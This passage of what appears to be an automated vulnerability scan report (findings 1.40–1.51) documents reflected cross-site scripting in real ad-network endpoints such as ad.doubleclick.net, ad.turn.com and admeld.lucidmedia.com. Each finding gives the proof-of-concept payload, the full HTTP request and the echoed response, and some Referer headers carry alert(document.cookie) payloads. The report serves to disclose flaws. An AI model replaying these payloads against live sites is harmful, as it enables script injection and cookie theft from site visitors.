1.40. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd73e"-alert(1)-"c148583078f was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134fd73e"-alert(1)-"c148583078f&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134fd73e"-alert(1)-"c148583078f&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "op
...[SNIP]...

1.41. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e22"-alert(1)-"740480bcef9 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f1e22"-alert(1)-"740480bcef9&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f1e22"-alert(1)-"740480bcef9&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

1.42. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bef59'-alert(1)-'24e894d3194 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bef59'-alert(1)-'24e894d3194&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bef59'-alert(1)-'24e894d3194&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

1.43. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bc0b"-alert(1)-"ee4b25273ee was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=5bc0b"-alert(1)-"ee4b25273ee HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5908
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:16 GMT
Expires: Mon, 07 Feb 2011 02:28:16 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=5bc0b"-alert(1)-"ee4b25273eehttp%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var op
...[SNIP]...

1.44. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b432f'-alert(1)-'0eb20d682e8 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=b432f'-alert(1)-'0eb20d682e8 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5908
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:20 GMT
Expires: Mon, 07 Feb 2011 02:28:20 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=b432f'-alert(1)-'0eb20d682e8http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

1.45. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18aaa'-alert(1)-'1667d1ce1b1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=5834879907726065318aaa'-alert(1)-'1667d1ce1b1&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=5834879907726065318aaa'-alert(1)-'1667d1ce1b1&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

1.46. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 132c3"-alert(1)-"27b6307f1fc was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653132c3"-alert(1)-"27b6307f1fc&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653132c3"-alert(1)-"27b6307f1fc&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

1.47. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 933c7"><script>alert(1)</script>c46c0426e93 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=933c7"><script>alert(1)</script>c46c0426e93 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 06-Aug-2011 02:33:21 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 07 Feb 2011 02:33:20 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=4570044593317657583&fpid=933c7"><script>alert(1)</script>c46c0426e93&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.48. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 482b7'%3balert(1)//1faf0348dc7 was submitted in the admeld_adprovider_id parameter. This input was echoed as 482b7';alert(1)//1faf0348dc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73482b7'%3balert(1)//1faf0348dc7&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045601273&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3Fign105ab01%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E958cbd566d4&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Mon, 07 Feb 2011 02:26:28 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2r4Mi92x-Y-; Domain=.lucidmedia.com; Expires=Tue, 07-Feb-2012 02:26:28 GMT; Path=/
Set-Cookie: 1609092=00000000001; Domain=.lucidmedia.com; Expires=Tue, 07-Feb-2012 02:26:28 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73482b7';alert(1)//1faf0348dc7&external_user_id=3297869551067506954"/>');

1.49. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8e99'%3balert(1)//df4307a598c was submitted in the admeld_callback parameter. This input was echoed as f8e99';alert(1)//df4307a598c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf8e99'%3balert(1)//df4307a598c HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045601273&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3Fign105ab01%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E958cbd566d4&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Mon, 07 Feb 2011 02:26:31 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2r4Mi92x-Y-; Domain=.lucidmedia.com; Expires=Tue, 07-Feb-2012 02:26:31 GMT; Path=/
Set-Cookie: 1609092=00000000001; Domain=.lucidmedia.com; Expires=Tue, 07-Feb-2012 02:26:31 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matchf8e99';alert(1)//df4307a598c?admeld_adprovider_id=73&external_user_id=3297869551067506954"/>');

1.50. http://ads.adxpose.com/ads/ads.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 543f1<script>alert(1)</script>501477c8a8d was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=amRZRPmRXMjwy5CP_1630363543f1<script>alert(1)</script>501477c8a8d HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front?t=1297040536334&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A0C863B2E23E60DAB8555153C303FBD7; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 07 Feb 2011 01:03:45 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
E_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_amRZRPmRXMjwy5CP_1630363543f1<script>alert(1)</script>501477c8a8d".replace(/[^\w\d]/g,""),"amRZRPmRXMjwy5CP_1630363543f1<script>
...[SNIP]...

1.51. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85eca"-alert(1)-"6337c1d9bd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

